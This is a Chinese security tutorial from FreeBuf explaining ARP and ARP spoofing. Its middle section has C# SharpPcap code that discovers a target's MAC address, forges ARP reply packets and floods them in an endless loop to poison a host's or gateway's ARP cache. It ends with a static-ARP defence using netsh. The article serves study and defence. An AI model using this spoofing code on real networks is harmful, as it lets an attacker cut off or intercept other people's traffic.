引言
未知攻,焉知防,本文仅用于研究ARP欺骗攻击与防护技术,切勿用于非法用途,本文不承担任何法律责任。
什么是ARP协议
官话:在以太网协议中规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须要知道目标主机的MAC地址。而在TCP/IP协议中,网络层和传输层只关心目标主机的IP地址。这就导致在以太网中使用IP协议时,数据链路层的以太网协议接到上层IP协议提供的数据中,只包含目的主机的IP地址。于是需要一种方法,根据目的主机的IP地址,获得其MAC地址。这就是ARP协议要做的事情。所谓地址解析(address resolution)就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。– Extracted from WikiPedia.
通俗点说,在局域网中通信时使用的是MAC地址,而不是常见的IP地址。所以在局域网的两台主机间通信时,必须要知道对方的MAC地址,这就是ARP协议要做的事:将IP地址转换为MAC地址。
从以太网帧来看,以太网帧分为:以太网首部、上层数据部分、以太网尾,三部分。在物理层传输的数据都是使用以太网帧来封装起来传输的(通俗的说就是在数据包头加上以太网首部,数据包尾加上以太网尾),而网络传输是分层进行的,也就是物理层只处理物理层的数据,对于以太网帧中的上层数据部分并不关心。在以太网帧中,以太网首部中存放了目的主机的MAC地址和源主机的MAC用于在以太网中传输数据。所以,在以太网通信中,只知道对方的IP地址是不可以通信的,因为IP地址属于第三层(网络层)的地址,对于物理层的以太网帧来说IP地址属于上层数据部分,以太网是无法识别的,所以就要使用ARP协议获取到对方的MAC地址进行通信。
ARP是如何工作的?
举个栗子:现在有两台处于同一局域网的主机A、B。
主机 | IP地址 | MAC地址 |
---|---|---|
A | 192.168.1.1 | 0A-11-22-33-44-01 |
B | 192.168.1.2 | 0A-11-22-33-44-02 |
现在主机A要和主机B通信,那么根据上面的介绍可以知道,主机A仅有主机B的IP地址是不可以通信的,还要知道主机B的MAC地址,下面介绍主机A是如何通过ARP协议获取主机B的MAC地址的:
第1步:根据主机A上的路由表内容,IP确定用于访问主机B的转发IP地址是192.168.1.2。然后A主机在自己的本地ARP缓存中检查主机B的匹配MAC地址。
第2步:如果主机A在ARP缓存中没有找到映射,它将询问192.168.1.2的硬件地址,从而将ARP请求帧广播到本地网络上的所有主机。源主机A的IP地址和MAC地址都包括在ARP请求中。本地网络上的每台主机都接收到ARP请求并且检查是否与自己的IP地址匹配。如果主机发现请求的IP地址与自己的IP地址不匹配,它将丢弃ARP请求
第3步:主机B确定ARP请求中的IP地址与自己的IP地址匹配,则将主机A的IP地址和MAC地址映射添加到本地ARP缓存中。
第4步:主机B将包含其MAC地址的ARP回复消息直接发送回主机A。
第5步:当主机A收到从主机B发来的ARP回复消息时,会用主机B的IP和MAC地址映射更新ARP缓存。本机缓存是有生存期的,生存期结束后,将再次重复上面的过程。主机B的MAC地址一旦确定,主机A就能向主机B发送IP通信了。
了解ARP协议的工作原理后可以分析出其存在一个严重的安全问题:
在ARP回复时,发送请求包的主机A并不会验证ARP回复包的真实性,也就是不能判断回复主机A的是不是主机B。由此引出一个局域网攻击方式ARP欺骗。
什么是ARP欺骗
举个栗子:
主机 | IP | MAC |
---|---|---|
A | 192.168.1.1 | 0A-11-22-33-44-01 |
B | 192.168.1.2 | 0A-11-22-33-44-02 |
C | 192.168.1.3 | 0A-11-22-33-44-03 |
1.主机A要和主机C通信,主机A发出ARP包询问谁是192.168.1.3?请回复192.168.1.1
2.这时主机B在疯狂的向主机A回复,我是192.168.1.3,我的地址是0A-11-22-33-44-02
3.由于ARP协议不会验证回复者的身份,造成主机A错误的将192.168.1.3的MAC映射为0A-11-22-33-44-02。
ARP欺骗的分类
1.主机欺骗,如同上面的栗子,主机B欺骗局域网中的主机A。
2.网关欺骗,局域网中的主机欺骗网关,从而获取其他主机的进流量。
ARP攻击的危害
1.造成局域网中的其他主机断网。
2.劫持局域网中其他主机或网关的流量,获取敏感信息等。
如何实现ARP攻击
找轮子
例如kali下的arpspoof、ettercap等工具。
造轮子
首先介绍下LibPacp:
LibPcap是一个UNIX下的C函数库,它提供的API,能获取和过滤从任意一块网卡在数据链路层上的帧。不同的UNIX系统有不同的架构去处理数据链路层上的数据帧,所以程序员如果想要写一个能运行在UNIX上的、直接读取或者操作数据链路层上的帧的应用程序,他就不得不专门为这个特点版本的UNIX写一个访问帧的函数。libpcap的目的就是提供一个抽象层,这样程序员就能编写可运行在所有版本的UNIX上的包获取和分析工具了。
然后是WinPcap:
WinPcap是一个专为Windows系统设计的、基于libpcap的库。大多数Windows下的网络流量分析工具都是基于WinPcap开发的,比如Wireshark。
接着是SharpPcap:
SharpPcap是封装好WinPcap和LibPcap的C#库。
除了知道开发用的库还要知道以太网帧和ARP报文的结构(SharpPcap提供了封装好的方法,但是为了学习还是自己造轮子):
第一部分:
以太网首部也可以说是以太网帧的头部,这部分包括了目标主机的MAC地址、源主机的MAC地址、上层协议类型
第二部分:
ARP报文这部分中的第20位,0x00,0x01表示ARP请求包,0x00,0x02表示应答包。由于以太网帧最短长度为64个字节,由于ARP报文加上以太网头不足64个字节,所以要填充18个字节的0x00第三部分:FCS帧校验序列即计算机网络数据链路层的协议数据单元(帧)的尾部字段,是一段4个字节的循环冗余校验码。源节点发送数据帧时,由帧的帧头和数据部分计算得出FCS,目的节点接收到后,用同样的方式再计算一遍FCS,如果与接收到的FCS不同,则认为帧在传输过程中发生了错误,从而选择丢弃这个帧。
知道了ARP欺骗的原理和ARP数据包的格式后,只要构造出一个ARP欺骗包,重复向目标主机发出就可以了。原理很简单,实现起来稍有一点难度:首先要先要获取本机的IP地址和MAC地址,我在下面的Deemo中实现了SharpPacp获取本机IPv4地址和MAC地址的方法:
代码分析:
LibPcapLiveDeviceList.Instance获取本机中所有网卡的
Listdevice.Address获取网卡中所有的地址信息(包括IPv4,IPv6,MAC)
Sockaddr.AddressType.AF_INET_AFINET6用于判断是不是IP地址(官方解释)
Sockaddr.AddressType.HARDWARE用于判断是不是MAC地址
接下来还要获取到目标主机的地址信息,IP地址和MAC可以手动指定,为了更加人性化的挨打操作,当然要根据输入的IP自动获得MAC地址了,知道ARP原理了,获取对方的MAC地址只要向对方发送一个ARP请求包然后监听网卡就可以了。代码如下:
/// <summary>
/// 发送ARP请求包,根据返回的应答包获取MAC地址
/// </summary>
public void ScanLAN(string recipientIP,string senderMAC,string senderIP)
{
// 构造Arp请求包
var arpPackets = BuildRequest(IPAddress.Parse(recipientIP), PhysicalAddress.Parse(senderMAC), IPAddress.Parse(senderIP));
//创建一个“tcpdump”过滤器,只允许读取arp回复
String arpFilter = "arp and ether dst " + senderMAC;
//open the device with 20ms timeout 打开设备,设置超时时间20ms
_device.Open(DeviceMode.Promiscuous, 20);
//set the filter 设置过滤器
_device.Filter = arpFilter;
//初始化扫描线程
scanThread = new Thread(() =>
{
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = new TimeSpan(0, 0, 1);
var timeoutDateTime = DateTime.Now + timeout;
while (DateTime.Now < timeoutDateTime)
{
if (requestInterval < (DateTime.Now - lastRequestTime))
{
// inject the packet to the wire 发送请求包
_device.SendPacket(arpPackets);
lastRequestTime = DateTime.Now;
}
//read the next packet from the network
var reply = _device.GetNextPacket(); //获取网卡中的下一个包,过滤出ARP
if (reply == null) //下一个包为空时,跳过本次循环
{
continue;
}
// parse the packet 解析数据包
var packet = PacketDotNet.Packet.ParsePacket(reply.LinkLayerType, reply.Data);
// is this an arp packet? 这是一个arp数据包吗?
var arpPacket = PacketDotNet.ARPPacket.GetEncapsulated(packet);
if (arpPacket == null)
{
continue;
}
//if this is the reply we're looking for, stop //ARP包中的源主机IP 等于 UI中的目标主机IP
if (arpPacket.SenderProtocolAddress.ToString().Equals(recipientIP))
{
// 通知事件 -更新靶机MAC
if (ResolvedEvent != null)
{
ResolvedEvent(this, arpPacket.SenderHardwareAddress);
}
break;
}
}
_device.Close(); //关闭设备
});
scanThread.Start(); //启动线程
}
代码解析:
创建一个线程专门用来发送ARP请求包和解析网卡中收到的ARP应答包,启动线程发送一个包后,检测网卡数据,并过滤出所有网卡中的ARP数据包,然后对包进行解析,如果包中的源主机IP是构造的包中的目标主机证明这个包是刚才发送的请求包的应答包,然后:
1.通知事件更新UI、
2.结束线程、
3.关闭设备
得到本机地址信息和目标主机的地址信息后,只要将之前构造的包中的相应的地址信息体替换掉就好了
除了要换掉包中的地址信息,还要在尾部加上FCS校验码:什么是FCS校验码?FCS:Frame Check Sequence(帧校验序列),俗称帧尾,即计算机网络数据链路层的协议数据单元(帧)的尾部字段,是一段4个字节的循环冗余校验码。源节点发送数据帧时,由帧的帧头和数据部分计算得出FCS,目的节点接收到后,用同样的方式再计算一遍FCS,如果与接收到的FCS不同,则认为帧在传输过程中发生了错误,从而选择丢弃这个帧。FCS提供了一种错误检测机制,用来验证帧在传输过程中的完整性。FCS采用了循环冗余校验CRC32校验算法,那么什么是CRC校验呢?CRC校验通俗点讲,就是将给出的二进制数据与一个固定的多项式进行莫2除计算,得出的余数就是CRC校验码。举个栗:计算4位的CRC校验码
知道CRC计算原理后,再来看一下CRC-4的实现:原始的 CRC 校验算法:根据多项式除法,我们就可以得到原始的 CRC 校验算法。假设生成多项式 g(x) 是 r 阶的,原始数据存放在 data 中,长度为 len 个 bit , reg 是 r+1 位的变量。 以 CRC-4 为例,生成多项式 g(x)=x^4 + x + 1 ,对应了一个 5bits 的二进制数字 10011 ,那么 reg 就是 5 bits 。
reg[1] 表明 reg 的最低位, reg[r+1] 是 reg 的最高位。
通过反复的移位和进行除法,那么最终该寄存器中的值去掉最高一位就是我们所要求的余数。所以可以将上述步骤用下面的流程描述:
reg = 0;
data = data追加r个;
pos = 1;
while(pos <= len)
{
if(reg[r+1] == 1) // 表明reg可以除以g(x)
{
// 只关心余数,根据上面的算法规则可知就是XOR运算
reg = reg XOR g(x);
}
// 移出最高位,移入新数据
reg = (reg<<1) | (data[pos]);
pos++;
}
return reg; // reg中的后r位存储的就是余数
上面只是简述一下CRC算法的原理,如果采用CRC-4的原始算法实现速度很慢,计算一个ARP数据包的CRC32码大约亲测需要十几秒左右的时间,建议以用CRC-32算法校验,由于CRC32算法实现比较复杂,这里不再做论述。
然后将计算得出的CRC32码粘到构造好的包尾就可以了。
//计算CRC32校验码
UInt32 u = GetCRC32(packet);
byte[] crc = new byte[4];
//Uint转Byte[4] CRC32 is Unit To Byte[4]
crc[0] = (byte)(u >> 24);
crc[1] = (byte)(u >> 16);
crc[2] = (byte)(u >> 8);
crc[3] = (byte)(u);
//填充FCS校验位
for (int i = 0; i < crc.Length; i++)
{
p1[p1.Length - 1 - 4 + i] = crc[i];
}
return p1;
到此,ARP数据包的构造就算完成了。
最后要实现ARP的欺骗,只要利用SharpPacp提供的发包方法,在线程中疯狂发包就可以了。
/// <summary>
/// arp欺骗:对内网PC进行欺骗
/// </summary>
/// <param name="getwayIP"></param>
/// <param name="wrongMac"></param>
/// <param name="destIP"></param>
/// <param name="destMac"></param>
public void StartARPSpoofing(string senderIP, string recipientIP,string senderMAC,string recipientMAC)
{
mIP = IPTOBYTE(recipientIP);
sIP = IPTOBYTE(senderIP);
mMAC = MACTOBYTE(recipientMAC);
sMAC = MACTOBYTE(senderMAC);
//构造ARP欺骗包
packet = getPacket(sIP, mIP, sMAC, mMAC);
//初始化发包线程
sendThread = new Thread(SendPack);
//启动线程
sendThread.Start();
}
/// <summary>
/// 发送数据
/// </summary>
public void SendPack()
{
_device.Open();
var timeoutDateTime = DateTime.Now + timeout;
//发送数据包
while (true)
{
_device.SendPacket(packet);
time++;
// 通知事件 -更新发包次数
if (ResolvedEvent != null)
{
ResolvedTimeEvent(this, time);
}
Thread.Sleep(100); //线程休眠100ms
}
}
正文:如何防御ARP欺骗
ARP欺骗是通过重复应答实现的,那么只需要在本机添加一条静态的ARP映射,这样就不需要询问网关MAC地址了,这种方法只对主机欺骗有效。对于网关欺骗还需要在网关中也添加一条到主机的静态ARP映射。1.用管理身份运行命令提示符;输入netsh i i show in,查看一下本机有哪些网络连接
netsh i i show in
2.查看一下网关的MAC地址。注意如果正遭受ARP欺骗攻击,通过此方法查处的可能是虚假的MAC地址。输入arp -a命令查询本机的arp映射表,如果找不到网关的信息,可以先ping一下网关。
3.输入:netsh -c “i i” add neighbors 连接的Idx号 网关IP 网关MAC 添加一条静态映射,我已经添加过了,所以会显示 对象已存在
netsh -c "i i" add neighbors 连接的Idx号 网关IP 网关MAC
netsh -c "i i" add neighbors 9 10.60.12.1 4c-5e-0c-64-73-f5
参考资料
SharpPcap官方文档PacketDotNet(使用PacketDotNet可以很方便的构造出数据包,只需几个参数)
SharpPcapTool(实现参考,没有做物理机的虚拟机网卡过滤,当遍历到虚拟机网卡的网关IP时会抛异常,因为VMware的虚拟机网卡没有网关地址)
牢底坐穿工具箱(我的实现,已经过滤掉了VMware的虚拟机网卡)
*本文原创作者:原来是小名啊,本文属FreeBuf原创奖励计划,未经许可禁止转载
来源:freebuf.com 2019-09-05 12:30:23 by: 原来是小名啊
请登录后发表评论
注册